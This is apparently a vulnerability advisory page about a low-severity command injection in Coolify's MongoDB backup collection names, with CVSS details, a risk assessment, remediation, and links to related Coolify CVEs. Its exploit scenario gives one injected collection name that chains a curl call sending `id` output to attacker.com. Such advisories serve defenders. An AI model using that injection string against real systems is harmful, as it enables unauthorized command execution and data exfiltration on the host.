Severity by source
AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N
Network-accessible admin UI justifies AV:N; exploitation requires admin privilege (PR:H) and specific backup configuration alignment (AC:H); no availability impact observed.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. From 4.0.0-beta.451 through 4.0.0-beta.470, database backup handling for MongoDB collection names did not fully validate shell metacharacters, allowing a highly privileged attacker who can configure backup inputs to inject commands. This issue is fixed in version 4.0.0-beta.471.
AnalysisAI
Command injection in Coolify's MongoDB backup handler (versions 4.0.0-beta.451 through 4.0.0-beta.470) allows a highly privileged attacker who controls backup configuration to inject OS-level shell commands via unsanitized metacharacters in MongoDB collection names. The attack requires an already-administrative account capable of modifying backup inputs, substantially limiting the realistic threat surface. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires a Coolify account with high administrative privileges capable of configuring MongoDB backup jobs - specifically the ability to set or modify MongoDB collection names used in backup inputs (reflected by PR:H in the CVSS vector). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 3.3 (Low) accurately reflects the constrained real-world risk: AV:N indicates the Coolify management interface is network-accessible, but PR:H requires an already highly privileged admin account, and AC:H signals that additional conditions (specific backup configuration with crafted collection names) must align for exploitation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A highly privileged Coolify administrator - or a threat actor who has compromised an admin account through credential theft or session hijacking - navigates to the MongoDB backup configuration and sets a collection name containing a shell metacharacter sequence such as `legit_collection; curl attacker.com/$(id)`. When the scheduled or manually triggered backup job executes, the unsanitized collection name is passed to the shell, causing the injected command to run in the context of the backup process on the host. … |
| Remediation | Upgrade to Coolify version 4.0.0-beta.471, which contains the vendor-confirmed fix per the release at https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.471. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Coolify, a self-hosted server management platform, allows authenticated users to inject OS commands through the Git Repo
A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application
Coolify through v4.0.0-beta.434 exposes the root user's SSH private key to low-privileged team members. Any user with ba
Cross-team authorization bypass in Coolify (open-source self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated,
Coolify before 4.0.0-beta.445 allows command injection through docker-compose.yaml parameters. If a victim creates an ap
Coolify versions prior to v4.0.0-beta.420.7 are vulnerable to a remote code execution vulnerability in the project deplo
Coolify versions prior to v4.0.0-beta.420.6 are vulnerable to a remote code execution vulnerability in the application d
Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permiss
Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authentica
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. [CVSS 8.8 HIGH]
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0
An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41958